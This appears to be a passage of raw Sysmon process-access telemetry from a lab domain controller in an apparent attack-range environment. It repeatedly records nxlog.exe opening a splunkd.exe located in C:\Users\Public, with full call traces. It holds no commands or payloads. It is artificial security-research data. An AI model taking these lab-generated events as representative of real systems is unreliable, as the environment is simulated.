C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:31.729","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-130F-5F25-0000-001053C20A00}","TargetProcessId":"1364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:32.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:32.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:33.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:33.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:34.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:34.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7290,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:35.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:35.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7291,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:36.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:36.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7292,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:37.620\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:37.620","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 